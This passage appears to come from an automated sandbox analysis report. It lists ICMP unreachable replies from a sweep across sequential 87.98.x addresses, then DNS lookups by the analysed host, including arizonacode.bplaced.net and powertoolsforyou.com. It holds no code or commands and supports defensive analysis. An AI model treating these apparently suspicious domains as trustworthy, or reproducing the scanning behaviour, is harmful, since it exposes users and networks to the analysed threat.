                                                                                                                                                Sep 29, 2022 14:48:50.201512098 CEST87.98.177.159192.168.2.3c8d1(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.201528072 CEST87.98.177.157192.168.2.3c8cf(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.203726053 CEST87.98.177.167192.168.2.3c8d9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.203773975 CEST87.98.177.166192.168.2.3c8ce(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.203789949 CEST87.98.177.174192.168.2.3c8e0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.204010963 CEST87.98.177.169192.168.2.3c8db(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.205775976 CEST87.98.177.214192.168.2.3c908(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.205923080 CEST87.98.177.193192.168.2.3c8f3(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.206377029 CEST87.98.177.198192.168.2.3c8f8(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.206749916 CEST87.98.177.203192.168.2.3c8fd(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.207221985 CEST87.98.177.204192.168.2.3c8fe(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.208236933 CEST87.98.177.206192.168.2.3c900(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.208678961 CEST87.98.177.207192.168.2.3c901(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.212611914 CEST87.98.177.210192.168.2.3c904(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.212961912 CEST87.98.177.211192.168.2.3c905(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.213354111 CEST87.98.177.220192.168.2.3c90e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.213570118 CEST87.98.177.219192.168.2.3c90d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.213689089 CEST87.98.177.215192.168.2.3c909(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.213876963 CEST87.98.177.218192.168.2.3c90c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.214680910 CEST87.98.177.212192.168.2.3c906(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.214948893 CEST87.98.177.230192.168.2.3c918(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.217360973 CEST87.98.177.239192.168.2.3c921(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.223072052 CEST87.98.177.233192.168.2.3c911(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.228810072 CEST87.98.177.253192.168.2.3c92f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.234098911 CEST87.98.177.244192.168.2.3c926(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.234122992 CEST87.98.177.243192.168.2.3c925(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:50.236462116 CEST87.98.177.250192.168.2.3c92c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.263425112 CEST178.33.99.160192.168.2.3c13a(Time to live exceeded in transit)Time Exceeded
                                                                                                                                                Sep 29, 2022 14:48:51.266287088 CEST87.98.178.12192.168.2.3c93e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.269815922 CEST87.98.178.27192.168.2.3c94d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.272196054 CEST87.98.177.255192.168.2.3c931(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.272234917 CEST87.98.178.0192.168.2.3c932(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.272758961 CEST87.98.178.9192.168.2.3c93b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.274590969 CEST87.98.178.21192.168.2.3c940(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.274626017 CEST87.98.178.19192.168.2.3c945(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.274661064 CEST87.98.178.22192.168.2.3c948(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.275003910 CEST87.98.178.13192.168.2.3c93f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.275504112 CEST178.33.99.160192.168.2.3c160(Time to live exceeded in transit)Time Exceeded
                                                                                                                                                Sep 29, 2022 14:48:51.275558949 CEST87.98.178.25192.168.2.3c94b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.276448965 CEST87.98.178.33192.168.2.3c953(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.276643991 CEST87.98.178.36192.168.2.3c956(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.276751041 CEST87.98.178.37192.168.2.3c957(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.276958942 CEST87.98.178.39192.168.2.3c959(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.277101994 CEST87.98.178.26192.168.2.3c94c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.277156115 CEST87.98.178.29192.168.2.3c94f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.277900934 CEST87.98.178.35192.168.2.3c955(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.277957916 CEST87.98.178.54192.168.2.3c968(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.278004885 CEST87.98.178.38192.168.2.3c958(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.278048992 CEST87.98.178.52192.168.2.3c966(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.284606934 CEST87.98.178.44192.168.2.3c95e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.286006927 CEST87.98.178.55192.168.2.3c969(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.286118031 CEST87.98.178.58192.168.2.3c96c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.286211014 CEST87.98.178.62192.168.2.3c970(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.286756039 CEST87.98.178.61192.168.2.3c96f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.286889076 CEST87.98.178.59192.168.2.3c96d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.286922932 CEST87.98.178.60192.168.2.3c96e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.287822008 CEST87.98.178.69192.168.2.3c96d(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.287844896 CEST87.98.178.71192.168.2.3c979(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.287900925 CEST87.98.178.74192.168.2.3c97c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.288599014 CEST87.98.178.76192.168.2.3c977(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.289035082 CEST87.98.178.79192.168.2.3c981(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.289856911 CEST87.98.178.81192.168.2.3c983(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.301963091 CEST87.98.178.120192.168.2.3c9aa(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.303764105 CEST87.98.178.90192.168.2.3c98c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.303792953 CEST87.98.178.95192.168.2.3c991(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.303812027 CEST87.98.178.89192.168.2.3c98b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.305358887 CEST87.98.178.145192.168.2.3c9c3(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.306133986 CEST87.98.178.97192.168.2.3c993(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.306973934 CEST87.98.178.106192.168.2.3c99c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.307029009 CEST87.98.178.99192.168.2.3c995(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.309025049 CEST87.98.178.121192.168.2.3c9ab(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.309485912 CEST87.98.178.122192.168.2.3c9ac(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.309919119 CEST87.98.178.125192.168.2.3c9af(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.310235023 CEST87.98.178.181192.168.2.3c9e7(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.310513020 CEST87.98.178.130192.168.2.3c9b4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.311388969 CEST87.98.178.186192.168.2.3c9ec(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.311417103 CEST87.98.178.176192.168.2.3c9e2(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.311435938 CEST87.98.178.131192.168.2.3c9b5(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.311923027 CEST87.98.178.190192.168.2.3c9f0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.312325001 CEST87.98.178.193192.168.2.3c9f3(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.312894106 CEST87.98.178.146192.168.2.3c9c4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.313736916 CEST87.98.178.152192.168.2.3c9ca(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.314024925 CEST87.98.178.148192.168.2.3c9c6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.315104961 CEST87.98.178.159192.168.2.3c9d1(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.316790104 CEST87.98.178.172192.168.2.3c9de(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.317471027 CEST87.98.178.173192.168.2.3c9df(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.317874908 CEST87.98.178.178192.168.2.3c9e4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.317905903 CEST87.98.178.167192.168.2.3c9d9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.318545103 CEST87.98.178.188192.168.2.3c9ee(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.318635941 CEST87.98.178.189192.168.2.3c9ef(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.318794966 CEST87.98.178.183192.168.2.3c9e9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.318814993 CEST87.98.178.184192.168.2.3c9ea(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.324495077 CEST87.98.178.241192.168.2.3ca23(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.325623035 CEST87.98.178.195192.168.2.3c9f5(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.325654984 CEST87.98.178.194192.168.2.3c9f4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.325829029 CEST87.98.178.197192.168.2.3c9f7(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.325975895 CEST87.98.178.199192.168.2.3c9f9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.326740980 CEST87.98.178.207192.168.2.3ca01(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.326791048 CEST87.98.178.206192.168.2.3ca00(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.326824903 CEST87.98.178.208192.168.2.3ca02(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.327064991 CEST87.98.178.205192.168.2.3c9ff(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.327397108 CEST87.98.178.213192.168.2.3ca00(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.327892065 CEST87.98.178.212192.168.2.3c9ff(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.328085899 CEST87.98.178.214192.168.2.3ca08(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.328896046 CEST87.98.178.225192.168.2.3ca13(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.330298901 CEST87.98.178.234192.168.2.3ca1c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.330528975 CEST87.98.178.236192.168.2.3ca1e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.330749989 CEST87.98.178.237192.168.2.3ca1f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.331415892 CEST87.98.178.240192.168.2.3ca22(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.332200050 CEST87.98.178.247192.168.2.3ca22(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.332329988 CEST87.98.178.249192.168.2.3ca2b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.332588911 CEST87.98.178.246192.168.2.3ca28(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.333439112 CEST87.98.178.254192.168.2.3ca30(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.333493948 CEST87.98.178.251192.168.2.3ca23(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:51.845611095 CEST51.210.99.220192.168.2.3c92a(Host unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.333787918 CEST87.98.179.3192.168.2.3ca35(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.334352970 CEST87.98.179.13192.168.2.3ca3f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.341396093 CEST87.98.178.255192.168.2.3ca31(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.341470957 CEST87.98.179.4192.168.2.3ca36(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.341681957 CEST87.98.179.5192.168.2.3ca37(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.341732979 CEST87.98.179.0192.168.2.3ca32(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.341780901 CEST87.98.179.8192.168.2.3ca3a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.343051910 CEST87.98.179.14192.168.2.3ca40(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.373891115 CEST87.98.179.20192.168.2.3ca46(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.374053001 CEST87.98.179.24192.168.2.3ca4a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.374768972 CEST87.98.179.31192.168.2.3ca51(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.374798059 CEST87.98.179.30192.168.2.3ca50(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.374972105 CEST87.98.179.29192.168.2.3ca4f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.375478029 CEST87.98.179.37192.168.2.3ca57(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.375524998 CEST87.98.179.34192.168.2.3ca54(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.375765085 CEST87.98.179.45192.168.2.3ca5f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.375885010 CEST87.98.179.44192.168.2.3ca5e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.376364946 CEST87.98.179.41192.168.2.3ca5b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.377177954 CEST87.98.179.53192.168.2.3ca67(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.377655983 CEST87.98.179.51192.168.2.3ca65(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.377670050 CEST87.98.179.50192.168.2.3ca64(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.378410101 CEST87.98.179.54192.168.2.3ca68(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.378570080 CEST87.98.179.56192.168.2.3ca6a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.397109032 CEST87.98.179.82192.168.2.3ca7d(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.397557020 CEST87.98.179.58192.168.2.3ca65(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.399274111 CEST87.98.179.60192.168.2.3ca67(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.401593924 CEST87.98.179.66192.168.2.3ca74(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.402162075 CEST87.98.179.69192.168.2.3ca77(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.402333975 CEST87.98.179.70192.168.2.3ca78(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.402834892 CEST87.98.179.106192.168.2.3ca9c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.403647900 CEST87.98.179.78192.168.2.3ca80(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.404208899 CEST87.98.179.76192.168.2.3ca7e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.404954910 CEST87.98.179.80192.168.2.3ca82(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.404978037 CEST87.98.179.93192.168.2.3ca8f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.405625105 CEST87.98.179.96192.168.2.3ca92(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.409816027 CEST87.98.179.99192.168.2.3ca95(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.410286903 CEST87.98.179.105192.168.2.3ca9b(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.411271095 CEST87.98.179.107192.168.2.3ca9d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.411431074 CEST87.98.179.118192.168.2.3caa8(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.411504030 CEST87.98.179.109192.168.2.3ca98(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.411745071 CEST87.98.179.123192.168.2.3caa6(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.411767006 CEST87.98.179.115192.168.2.3caa5(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.411818981 CEST87.98.179.119192.168.2.3caa9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.411952019 CEST87.98.179.112192.168.2.3caa2(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.412031889 CEST87.98.179.113192.168.2.3caa3(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.412096024 CEST87.98.179.104192.168.2.3ca9a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.412122011 CEST87.98.179.125192.168.2.3caaf(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.414781094 CEST87.98.179.153192.168.2.3cacb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.419836998 CEST87.98.179.135192.168.2.3cab9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.420289040 CEST87.98.179.137192.168.2.3cabb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.420831919 CEST87.98.179.136192.168.2.3caba(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.421500921 CEST87.98.179.149192.168.2.3cac7(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.421550035 CEST87.98.179.142192.168.2.3cac0(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.422787905 CEST87.98.179.162192.168.2.3cad4(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.422816038 CEST87.98.179.159192.168.2.3caca(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.422869921 CEST87.98.179.155192.168.2.3cac3(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.423242092 CEST87.98.179.166192.168.2.3cad8(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.424146891 CEST87.98.179.164192.168.2.3cad6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.424916029 CEST87.98.179.173192.168.2.3cadf(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.424941063 CEST87.98.179.160192.168.2.3cad2(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.425120115 CEST87.98.179.171192.168.2.3cadd(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.426054955 CEST87.98.179.188192.168.2.3caee(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.426347017 CEST87.98.179.187192.168.2.3caed(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.426897049 CEST178.33.99.160192.168.2.3c326(Time to live exceeded in transit)Time Exceeded
                                                                                                                                                Sep 29, 2022 14:48:52.426929951 CEST87.98.179.189192.168.2.3caef(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.428512096 CEST87.98.179.199192.168.2.3caf9(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.428602934 CEST87.98.179.196192.168.2.3caf6(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.429845095 CEST87.98.179.201192.168.2.3cafb(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.429882050 CEST87.98.179.206192.168.2.3cb00(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.432394028 CEST87.98.179.210192.168.2.3cb04(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.432421923 CEST87.98.179.214192.168.2.3cb08(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.432441950 CEST87.98.179.213192.168.2.3cb07(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.432601929 CEST87.98.179.218192.168.2.3cb0c(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.432894945 CEST87.98.179.216192.168.2.3cb0a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.433002949 CEST87.98.179.222192.168.2.3cb10(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.433023930 CEST87.98.179.223192.168.2.3cb11(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.433787107 CEST87.98.179.220192.168.2.3cb0e(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.434055090 CEST87.98.179.221192.168.2.3cb0f(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.434467077 CEST87.98.179.229192.168.2.3cb10(Unknown)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.434560061 CEST87.98.179.232192.168.2.3cb1a(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.434765100 CEST87.98.179.242192.168.2.3cb24(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.435754061 CEST87.98.179.240192.168.2.3cb22(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.435781002 CEST87.98.179.230192.168.2.3cb18(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.436230898 CEST87.98.179.245192.168.2.3cb27(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.436367989 CEST87.98.179.246192.168.2.3cb28(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:52.437434912 CEST87.98.179.251192.168.2.3cb2d(Port unreachable)Destination Unreachable
                                                                                                                                                Sep 29, 2022 14:48:53.444703102 CEST87.98.179.255192.168.2.3cb31(Port unreachable)Destination Unreachable
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Sep 29, 2022 14:48:19.324655056 CEST192.168.2.38.8.8.80xef93Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:48:20.304707050 CEST192.168.2.38.8.8.80x9682Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:17.286513090 CEST192.168.2.38.8.8.80x1ae0Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:19.480129004 CEST192.168.2.38.8.8.80xcf24Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:19.652098894 CEST192.168.2.38.8.8.80x4bcdStandard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:24.550293922 CEST192.168.2.38.8.8.80xeadStandard query (0)powertoolsforyou.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:35.699618101 CEST192.168.2.38.8.8.80x2358Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:38.762623072 CEST192.168.2.38.8.8.80xeee9Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:41.312468052 CEST192.168.2.38.8.8.80x6128Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:44.405601025 CEST192.168.2.38.8.8.80xef42Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:46.710273981 CEST192.168.2.38.8.8.80x13beStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:47.002482891 CEST192.168.2.38.8.8.80x24b7Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:49.975743055 CEST192.168.2.38.8.8.80x37bStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:49:56.839838982 CEST192.168.2.38.8.8.80x6a01Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:00.112668037 CEST192.168.2.38.8.8.80x6d96Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:03.463121891 CEST192.168.2.38.8.8.80xc906Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:08.576381922 CEST192.168.2.38.8.8.80x400eStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:10.588630915 CEST192.168.2.38.8.8.80x6338Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:13.719899893 CEST192.168.2.38.8.8.80x4e09Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:50:15.246871948 CEST192.168.2.38.8.8.80xe3faStandard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
